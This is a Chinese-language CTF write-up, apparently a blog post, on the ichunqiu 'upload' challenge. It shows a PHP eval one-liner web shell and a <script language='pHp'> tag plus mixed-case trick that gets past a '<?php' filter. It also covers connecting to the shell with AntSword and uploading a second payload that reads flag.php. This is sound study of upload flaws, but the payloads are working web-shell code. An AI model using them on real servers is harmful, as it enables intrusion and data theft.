网安菜鸡今天来划水了!

今天一直在肝网鼎的一道题,涉及的知识太多了,整不完了,只能随便水个题打开了【狗头】。CTF题目属于萌新入门级,写下WP仅供自己总结练习,大佬请自行绕路,另外如果有师傅愿意有每日轻松一笑环结,还望不吝赐教。【狗头】

打开题目,是一个上传文件的页面,提示:可以上传任意文件。

先找了一个JPG的图像,显示上传成功,然后又测试了TXT文本,也是上传成功,最后传了PHP文件,还是显示上传成功,所以证明前端对文件格式没有限制。
但是我们上传PHP一句话木马文件后,点击查看输出结果。

<?php @eval($_POST['abc']);?>

虽然上传成功,但是给我们返回了这么个东西

证明<?php被过滤掉了。
解决这个方法的思路是看看有没有办法绕过过滤,把PHP一句话木马传到后台。
于是找了个可以绕过的

<script language="pHp">@eval($_POST['abc'])</script>

点击之后发现是空页,代表我们上传成功!
接下来用蚁剑链接

这里需要注意URL地址路径一定是你传一句话木马的路径,不然无法连接成功。本题的路径就是显示上传成功,然后点击超链接查看上传的文件,此时URL已经跳转完成,即为上传文件的路径。

在html目录下即可找到flag.php。

还有一个办法是可以不用蚁剑或菜刀链接,直接用上传的php源代码把flag显示出来。

<?php
$fh=fopen('../flag.php','r');
echo fread($fh,filesize("../flag.php"));
fclose($fh);
?>

初始上传的文件是这样的,但是<? 和 php 被过滤了,用大小写(PHP,pHp)绕过php过滤,用<script language=“pHp”> 绕过<?过滤,最终上传的文件:

<script language="PHP">
$fh=fopen("../flag.".strtolower("PHP"),'r');
echo fread($fh,filesize("../flag.".strtolower("PHP")));
fclose($fh);
</script>

最后会在页面上显示出flag,但是这种方法有一个弊端,就是得事先知道flag文件的存储路径,这道题是在上一级目录下也就是html目录下存放,所以相对路径是…/flag.php ,两个点代表上级目录。如果没有经验的小白推荐还是上传一句话木马,在蚁剑里查看网站目录结构,再在其中寻找flag。

很久以前,就做过一道upload文件上传的题目,当时踩了很多坑,一个是前端过滤需要抓包改包,再一个是一句话木马,post要大写,还有一个就是蚁剑的URL一定是一句话的路径,希望大家和我以后做题多多注意。

纪念一下当时呆萌的自己【狗头】

ichunqiu upload wp相关推荐

  1. 网络攻防路-ichunqiu upload

    i春秋上的一道题Upload 题目 题解: 发现被屏蔽了<? php 重新编辑,上传  发现页面一片空白,查看网页源代码,得到flag 后记: <!DOCTYPE html> < ...

  2. ichunqiu Web SQli wp

    2020.1.10 菜鸡今天又来水题了. 其实这个题,不是很水[狗头]在i春秋平台上看到了一道名为SQli的web题,想到了自己玩过1%的那个靶场也叫sqli-libs,于是手贱的打开了.咋一看还蛮友 ...

  3. 面向萌新的红帽杯2018线上赛wp

    网络安全攻防大赛第二届"红帽杯"网络安全攻防大赛(除了web3 guess id,不会做.没写.) misc2 Not Only Wireshark 下载流量包,wireshark ...

  4. MTCTF2022 WP

    Web easypickle 源码 import base64 import pickle from flask import Flask, session import os import rand ...

  5. CTF Web题 部分WP

    1.web2 听说聪明的人都能找到答案 http://123.206.87.240:8002/web2/ CTRL + u 查看源代码 2.计算器 http://123.206.87.240:8002 ...

  6. decode判断不为空拼接_空指针4月内部赛官方WP

    本次内部赛含WEB跟RE题目各一道,其中RE题目7人解出,WEB题目1人解出,恭喜以上选手. 下面放上本次内部赛的WP. RE题目由于前几次的空指针题目太难了,所以这次出了一道较为简单的题(要不然每次 ...

  7. upload总结及一般处理思路步骤

    Table of Contents upload的一般的检测手段及绕过方法总结: 一,前端的javascript检测: 一般的绕过方法: 1,禁用前端的javascript检测 2,直接F12,修改页 ...

  8. 中upload依赖包_upload-labs writeup

    upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场.旨在帮助大家对上传漏洞有一个全面的了解.目前一共20关,每一关都包含着不同上传方式.github地 ...

  9. 史上最详细sql注入wp

    文章目录 sql注入wp(史上最详细) 前言 什么是SQL注入? SQL注入的原理 常见的注入方式 常见绕过技巧 常见防控SQL注入的方法 手工查询语句 Basic Challenges Less-1 ...

最新文章

  1. redhat中使用securecrt 中文乱码解决办法
  2. nginx日志通过rsyslog传入到日志服务器指定目录
  3. JS函数重载解决方案
  4. 不写画面的网页程序设计,Web API、Web Service、WCF Service
  5. QT的QJSValue类的使用
  6. Mysqldump逻辑备份与恢复
  7. 基于密度的停留点识别方法
  8. OpenCV辅助对象(help objects)(2)_Range
  9. 500万相机芯片尺寸_MGS二代系列500万像素新品面世
  10. 【转】JAVA成长之路
  11. JavaScript中的数据结构及实战系列(1):队列
  12. 泛微OA如何重置管理员密码
  13. 看看“电子招投标平台”是如何识破“围标串标”的,看完少走弯路
  14. 应用文写作(超星尔雅)
  15. react异常 Each child in a list should have a unique “key” prop
  16. python列表元素提取_python提取list中的元素
  17. 什么是串口通信UART?
  18. 第一次养狗_如何度过艰难的第一个月
  19. appcan 文件下载到根目录(pdf)
  20. [数分笔记]关于有限覆盖定理

热门文章

  1. 麻烦的罗马字符白字注音
  2. STemWin 图像锚点的理解 [1]
  3. RxTools一款强大实用的工具类集合
  4. 这次破纪录的黑洞喷发可能会覆盖天空中的16次满月
  5. python打印星号菱形_Python练习题 018:打印星号菱形
  6. js 的一维数组,二维数组
  7. 盗梦空间影评-----------十年磨一见
  8. 知乎高赞:java初学者如何通过自学快速找到第一份工作?
  9. 清华汪玉等电子设计自动化ML论文综述:180篇文献、ACM TODAES接收
  10. Matlab CPU并行计算